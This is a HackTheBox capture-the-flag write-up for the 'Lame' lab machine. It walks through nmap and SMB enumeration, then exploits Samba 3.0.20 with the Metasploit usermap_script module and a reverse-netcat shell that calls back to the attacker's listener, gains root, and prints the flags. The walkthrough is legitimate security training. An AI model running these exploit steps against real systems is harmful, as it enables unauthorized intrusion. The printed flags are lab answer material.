HackTheBox - Lame

4 minute read

Initial Enumeration

nmap -sC -sV -v --min-rate=1000 10.10.10.3 -oA lame

Nmap scan report for 10.10.10.3
Host is up (0.012s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.26
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2024-07-18T07:36:03-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 1h52m42s, deviation: 2h49m46s, median: -7m20s

Since anonymous FTP login is allowed, I attempted to sign in to the FTP server anonymously. However, I found that there were no files available in the FTP share.

I then attempted to interact with the SMB shares. Using smbmap, I found that I could enumerate shares through a null session. However, the null user only had access to the tmp share.

[*] Detected 1 hosts serving SMB                                             
[*] Established 1 SMB connections(s) and 1 authenticated session(s)          
[+] IP: 10.10.10.40:445 Name: 10.10.10.40              Status: Authenticated
      Disk       Permissions     Comment
      ----       -----------     -------
      print$     NO ACCESS       Printer Drivers
      tmp        READ, WRITE     oh noes!
      opt        NO ACCESS
      IPC$       NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))
      ADMIN$     NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))

Looking through the tmp share, we find that there is nothing of note, as the null user does not have access to most files within this share.

Foothold

If we review the nmap scan, we find that this box is running the following services and versions:

FTP: vsFTPd 2.3.4
SMB: Samba smbd 3.0.20-Debian

If we search for possible exploits:

$ searchsploit vsftpd 2.3.4    
--------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                     |  Path
--------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution                                                          | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                             | unix/remote/17491.rb
--------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

$ searchsploit samba 3.0.20 
--------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                     |  Path
--------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                             | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                   | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                                              | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                      | linux_x86/dos/36741.py
--------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

We will find two potential exploits that we can use.

In this case, however, the vsFTPd exploit does not work. The explanation can be found here.

Hence, we will proceed to use the SMB exploit instead. As our Samba version is 3.0.20, the second exploit (‘Username map script’) is of interest to us.

We can thus start Metasploit using msfconsole -q.

Then, from the console, look for the Username map script exploit and use it.

msf6 > search usermap_script

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution
<SNIP>

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.110.129   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.26
LHOST => 10.10.14.26
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3

Finally, run the exploit.

msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 10.10.14.26:4444 
[*] Command shell session 1 opened (10.10.14.26:4444 -> 10.10.10.3:44966) at 2024-07-18 08:34:42 -0400

From here, it appears that a shell session has started, but we do not see the meterpreter prompt. This implies that this is a standard shell session instead of a meterpreter session.

To confirm this, we should get a response if we enter whoami.

whoami
root

Now, we can simply upgrade our shell session to an interactive TTY session.

which python
/usr/bin/python
python -c 'import pty; pty.spawn("/bin/bash")'
root@lame:/# pwd
pwd
/

Finally, we can obtain the flags.

root@lame:/root# cat root.txt
cat root.txt
3e3ca46a0b10dc42b32fe2493a2a3de7

root@lame:/home/makis# cat user.txt
cat user.txt
024ddf63a92e34e9259c85fea398ce20

Share on

Twitter Facebook LinkedIn

HackTheBox - Lame

Initial Enumeration

Foothold

Share on

You may also enjoy

HackTheBox - Legacy

HackTheBox - Editorial

HackTheBox - BoardLight

HackTheBox - Blue